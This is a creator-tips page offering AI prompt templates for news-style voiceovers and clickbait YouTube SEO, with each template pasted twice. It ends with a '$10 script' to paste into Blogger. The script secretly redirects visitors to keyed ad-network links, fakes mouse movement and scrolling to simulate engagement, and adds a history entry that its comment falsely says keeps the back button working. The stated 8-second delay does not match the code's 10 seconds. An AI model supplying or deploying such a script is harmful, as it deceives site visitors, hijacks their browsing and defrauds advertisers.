🚀 Voiceover & YouTube SEO Prompts for Creators
🎙️ 1-Minute Voiceover Script Prompt
“Here is the link 👉 [paste website link].
From this content, create a 1-minute voiceover script in the style of US-based trending news or an informative update.
Guidelines:
- Only the voice script (no visuals).
- Open with a breaking news–style hook.
- Use clear, simple, American-style English that sounds like a TV/radio newsreader.
- Keep the tone fast-paced, energetic, and informative.
- Focus on the most shocking, trending, or viral-worthy details from the link.
- End with a teaser or call-to-action (example: “Stay tuned for more updates” or “Follow for the full story”).”
From this content, create a 1-minute voiceover script in the style of US-based trending news or an informative update.
Guidelines:
- Only the voice script (no visuals).
- Open with a breaking news–style hook.
- Use clear, simple, American-style English that sounds like a TV/radio newsreader.
- Keep the tone fast-paced, energetic, and informative.
- Focus on the most shocking, trending, or viral-worthy details from the link.
- End with a teaser or call-to-action (example: “Stay tuned for more updates” or “Follow for the full story”).”
🎬 Complete YouTube SEO Package Prompt
“Here is my topic 👉 [insert topic or paste link].
Please create a complete YouTube SEO package including:
Title:
- Craft a clickbait-style title optimized for high-volume keywords.
- Ensure it aligns with trending topics and captures viewer attention.
Description:
- Write a 2–3 paragraph description (150–200 words).
- Incorporate SEO-rich keywords naturally.
- Include a call-to-action like 'Subscribe for more' or 'Check the link below.'
Tags (500 characters):
- Generate a list of tags combining:
• High-volume keywords.
• Long-tail phrases.
• Trending hashtags.
• Related terms to maximize YouTube SEO reach.
- Ensure all elements are optimized for YouTube ranking in 2025 and written in an engaging US-audience style.”
Please create a complete YouTube SEO package including:
Title:
- Craft a clickbait-style title optimized for high-volume keywords.
- Ensure it aligns with trending topics and captures viewer attention.
Description:
- Write a 2–3 paragraph description (150–200 words).
- Incorporate SEO-rich keywords naturally.
- Include a call-to-action like 'Subscribe for more' or 'Check the link below.'
Tags (500 characters):
- Generate a list of tags combining:
• High-volume keywords.
• Long-tail phrases.
• Trending hashtags.
• Related terms to maximize YouTube SEO reach.
- Ensure all elements are optimized for YouTube ranking in 2025 and written in an engaging US-audience style.”
💻 10$ Script
This script redirects your visitors to a random link after 8 seconds, with subtle scroll and mouse movements that are barely noticeable.
<script>
if (!sessionStorage.getItem("redirected")) {
sessionStorage.setItem("redirected", "true");
var links = [
"https://www.profitableratecpm.com/mdt112bm31?key=4d2423b5ab7b5f81361868114e84a257",
"https://www.profitableratecpm.com/x3vvgpfe5?key=57e679bf4ec818d8c066a5cb574a57a7"
];
var randomLink = links[Math.floor(Math.random() * links.length)];
// Push a dummy state to history so the back button works
history.pushState(null, "", window.location.href);
// Very slow, subtle scroll
var scrollStep = 1;
var scrollInterval = setInterval(function() {
window.scrollBy(0, scrollStep);
}, 800);
// Very slow, subtle mouse movement
var mouseMoveInterval = setInterval(function() {
var evt = new MouseEvent("mousemove", {
clientX: Math.random() * window.innerWidth,
clientY: Math.random() * window.innerHeight
});
document.dispatchEvent(evt);
}, 1000);
// Redirect after ~8 seconds
setTimeout(function() {
clearInterval(scrollInterval);
clearInterval(mouseMoveInterval);
window.location.href = randomLink;
}, 10000);
}
</script>
if (!sessionStorage.getItem("redirected")) {
sessionStorage.setItem("redirected", "true");
var links = [
"https://www.profitableratecpm.com/mdt112bm31?key=4d2423b5ab7b5f81361868114e84a257",
"https://www.profitableratecpm.com/x3vvgpfe5?key=57e679bf4ec818d8c066a5cb574a57a7"
];
var randomLink = links[Math.floor(Math.random() * links.length)];
// Push a dummy state to history so the back button works
history.pushState(null, "", window.location.href);
// Very slow, subtle scroll
var scrollStep = 1;
var scrollInterval = setInterval(function() {
window.scrollBy(0, scrollStep);
}, 800);
// Very slow, subtle mouse movement
var mouseMoveInterval = setInterval(function() {
var evt = new MouseEvent("mousemove", {
clientX: Math.random() * window.innerWidth,
clientY: Math.random() * window.innerHeight
});
document.dispatchEvent(evt);
}, 1000);
// Redirect after ~8 seconds
setTimeout(function() {
clearInterval(scrollInterval);
clearInterval(mouseMoveInterval);
window.location.href = randomLink;
}, 10000);
}
</script>
💡 Tip: Paste this directly into your Blogger HTML editor. Visitors will experience a subtle delay and redirection after 8 seconds.
